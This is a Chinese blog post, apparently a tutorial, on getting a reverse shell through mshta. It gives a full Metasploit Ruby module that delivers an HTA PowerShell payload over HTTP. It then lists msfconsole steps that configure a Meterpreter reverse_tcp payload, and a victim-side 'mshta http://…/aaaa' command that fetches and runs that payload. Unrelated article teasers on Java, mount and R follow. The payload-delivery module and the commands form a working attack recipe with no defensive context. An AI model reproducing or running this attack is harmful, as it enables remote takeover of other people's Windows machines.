mshta 反弹shell

全栈程序员-站长 • 2022年7月15日上午11:46 • 未分类 • 阅读 85

mshta 反弹shell　　kali系统准备：　　复制以下ruby代码到/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb目录（要注意代码缩进哦）：###ThismodulerequiresMetasploit:https://metasploit.com/download#Currentso…

大家好，又见面了，我是你们的朋友全栈君。

　　kali系统准备：

　　复制以下ruby代码到/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb目录（要注意代码缩进哦）：

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
  
class MetasploitModule  < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::HttpServer
  
  def initialize(info  = {})
    super(update_info(info,
      'Name' => 'Microsoft Office Payload Delivery',
      'Description' => %q{
        This module generates an command to place within
        a word document, that when executed, will retrieve a HTA payload
        via HTTP from an web server. Currently have not figured out how
        to generate a doc.
      },
      'License' => MSF_LICENSE,
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'Targets' =>
        [
          ['Automatic', {} ],
        ],
      'DefaultTarget' => 0,
    ))
  end
  
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win '}
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end
  
  
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end

　　在命令行启动msf的服务：

service postgresql start

　　再启动msf：

sudo msfconsole

　　重新加载所有模块：

reload_all

　　查找我们刚刚新建的msh_shell模块：

search msh_shell

　　加载这个模块：

use exploit/windows/smb/msh_shell

　　使用反弹shellcode，配置本机地址, 配置uri地址

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.105
set uripath aaaa
exploit

　　window系统：

　　打开运行命令，执行：

mshta http://kali系统的IP/aaaa

　　kali系统就会收到一个window系统的shell

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请联系我们举报，一经查实，本站将立刻删除。

发布者：全栈程序员-站长，转载请注明出处：https://javaforall.net/159701.html原文链接：https://javaforall.net

赞 (0)

全栈程序员-站长

0 0

Java-重载与重写的区别[通俗易懂]

Java-重载与重写的区别[通俗易懂]重写（Override）规则：当子继承父类的方法时，此方法不适用于子的程序执行，需要进行重写。参数列表必须完全与被重写方法相同返回类型必须与被重写方法的返回类型相同子类重写的方法访问权限不能小于被重写的方法。父类的成员方法只能被它的子类重写声明为static和private的方法不能被重写，但是能够被再次声明重写（Override）和重载（Overload）的区别参数列表重写：参数列表必须与被重写的方法相同。重载：参数列表必须不同发生的位置重写：发生在子类中重载：发生在一个类

全栈程序员-站长
2022年7月7日
24
mount 命令介绍

mount 命令介绍磁盘挂载可以有效解决数据同步与磁盘空间浪费的问题而且支持不同操作系统之间挂载操作核心命令为 mount 本文介绍该命令挂载挂载常用的命令为 mount 其命令格式为 mount args devicedirarg 表示配置参数其中最常用的为 t 和 o 参数 t 指定文件系统的类型通常不必指定 mount 会自动选择正确的类型常用类型有 iso9660 光盘或光盘镜像 msdos DOSfat16 文件系统 vfat Windows9xfat 文件系统 n

全栈程序员-站长
2025年7月11日
5
java注解定义类型变量_JAVA自定义注解

JAVA自定义注解注解概念注解是JavaSE5.0版本开始引入的概念，它是对java源代码的说明，是一种元数据(描述数据的数据)。注解和注释的不同注释注释是对代码的说明，给代码的读者看，便于帮读者梳理业务逻辑；在程序代码中经常看到的以@开头的大部分是注解；注解注解也是对代码的说明，需要配合工具(解析它的代码)使用，参与代码的编译，给应用程序看的；注解分类注解以@开头，我们会在应用程序中见到各…

全栈程序员-站长
2022年4月13日
63
R语言入门-安装R和Rstuido软件

R语言入门-安装R和Rstuido软件安装R和Rstuido软件R语言是用于统计分析，图形表示和报告的编程语言和软件环境；Rstudio是编辑、运行R语言的最为理想的工具之一。1、官网下载R安装包下载地址为：https://cran.r-project.org 进入链接，如下图所示，在页面顶部提供了三个下载链接，分别对应三种操作系统：Windows、Mac和Linux。请选择自己操作系统对应的链接，接下来我将以wi…

全栈程序员-站长
2022年6月27日
46
Java入门必背100条

Java入门必背100条Java必背100条1、编写：编写的Java代码保存在以“.java”结尾的源文件中。2、编译：使用javac.exe命令编译java源文件，生成字节码文件。格式：javac源文件名.java3、运行：使用java.exe命令解释运行字节码文件。格式：java类名4、在一个java源文件中可以声明多个class，但是只能最多有一个类声明为public，而且被声明为public的类的…

全栈程序员-站长
2022年7月7日
21
linux无限刷屏代码,linux下如何实现简单刷屏

linux无限刷屏代码,linux下如何实现简单刷屏今天为了测试我的LCD有没有坏点写了一个简单的刷屏程序，效果还不错，分析给大家。代码如下：#include#include#include#include#include#include#include#includeintmain(intargc,char*argv[]){intfbfd=0;structfb_var_screeninfovinfo;struct…

全栈程序员-站长
2022年5月4日
156

发表回复

关注全栈程序员社区公众号